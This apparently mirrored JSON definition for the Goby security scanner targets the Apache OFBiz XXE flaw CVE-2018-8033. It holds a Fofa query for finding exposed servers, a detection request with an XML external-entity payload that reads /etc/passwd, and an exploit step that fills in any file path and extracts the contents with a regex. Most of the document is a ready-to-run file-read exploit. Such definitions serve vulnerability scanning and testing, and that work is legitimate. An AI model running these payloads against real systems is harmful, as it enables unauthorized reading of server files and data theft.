mirror of https://github.com/qwqdanchun/Goby.git
101 lines
3.2 KiB
JSON
101 lines
3.2 KiB
JSON
|
{
|
||
|
"Name": "Apache OFBiz XXE File Read (CVE-2018-8033)",
|
||
|
"Description": "In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.",
|
||
|
"Product": "Apache-OFBiz",
|
||
|
"Homepage": "https://ofbiz.apache.org/",
|
||
|
"DisclosureDate": "2018-12-13",
|
||
|
"Author": "itardc@163.com",
|
||
|
"GifAddress": "https://raw.githubusercontent.com/gobysec/GobyVuls/master/Apache%20OFBiz/CVE-2018-8033/CVE-2018-8033.gif",
|
||
|
"FofaQuery": "header=\"Set-Cookie: OFBiz.Visitor\"",
|
||
|
"GobyQuery": "header=\"Set-Cookie: OFBiz.Visitor\"",
|
||
|
"Level": "2",
|
||
|
"Impact": "",
|
||
|
"Recommendation": "",
|
||
|
"References": [
|
||
|
"https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E",
|
||
|
"https://nvd.nist.gov/vuln/detail/CVE-2018-8033",
|
||
|
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8033"
|
||
|
],
|
||
|
"HasExp": true,
|
||
|
"ExpParams": [
|
||
|
{
|
||
|
"name": "file",
|
||
|
"type": "createSelect",
|
||
|
"value": "/etc/passwd,/etc/hosts",
|
||
|
"show": ""
|
||
|
}
|
||
|
],
|
||
|
"ExpTips": {
|
||
|
"Type": "",
|
||
|
"Content": ""
|
||
|
},
|
||
|
"ScanSteps": [
|
||
|
"AND",
|
||
|
{
|
||
|
"Request": {
|
||
|
"data": "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>",
|
||
|
"data_type": "text",
|
||
|
"follow_redirect": false,
|
||
|
"header": {"Content-Type": "application/xml"},
|
||
|
"method": "POST",
|
||
|
"uri": "/webtools/control/xmlrpc"
|
||
|
},
|
||
|
"ResponseTest": {
|
||
|
"checks": [
|
||
|
{
|
||
|
"bz": "",
|
||
|
"operation": "==",
|
||
|
"type": "item",
|
||
|
"value": "200",
|
||
|
"variable": "$code"
|
||
|
},
|
||
|
{
|
||
|
"bz": "",
|
||
|
"operation": "contains",
|
||
|
"type": "item",
|
||
|
"value": "root:x",
|
||
|
"variable": "$body"
|
||
|
},
|
||
|
{
|
||
|
"bz": "",
|
||
|
"operation": "contains",
|
||
|
"type": "item",
|
||
|
"value": "text/xml",
|
||
|
"variable": "$head"
|
||
|
}
|
||
|
],
|
||
|
"operation": "AND",
|
||
|
"type": "group"
|
||
|
}
|
||
|
}
|
||
|
],
|
||
|
"ExploitSteps": [
|
||
|
"AND",
|
||
|
{
|
||
|
"Request": {
|
||
|
"data": "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file:////{{{file}}}\">]><methodCall><methodName>&disclose;</methodName></methodCall>",
|
||
|
"data_type": "text",
|
||
|
"follow_redirect": false,
|
||
|
"header": {"Content-Type": "application/xml"},
|
||
|
"method": "POST",
|
||
|
"uri": "/webtools/control/xmlrpc"
|
||
|
},
|
||
|
"SetVariable": [
|
||
|
"output|lastbody|regex|(?s)No such service \\[(.*?)\\]</value>"
|
||
|
]
|
||
|
}
|
||
|
],
|
||
|
"Tags": ["fileread"],
|
||
|
"CVEIDs": [
|
||
|
"CVE-2018-8033"
|
||
|
],
|
||
|
"CVSSScore": "7.5",
|
||
|
"AttackSurfaces": {
|
||
|
"Application": ["Apache-OFBiz"],
|
||
|
"Support": null,
|
||
|
"Service": null,
|
||
|
"System": null,
|
||
|
"Hardware": null
|
||
|
},
|
||
|
"Disable": false
|
||
|
}
|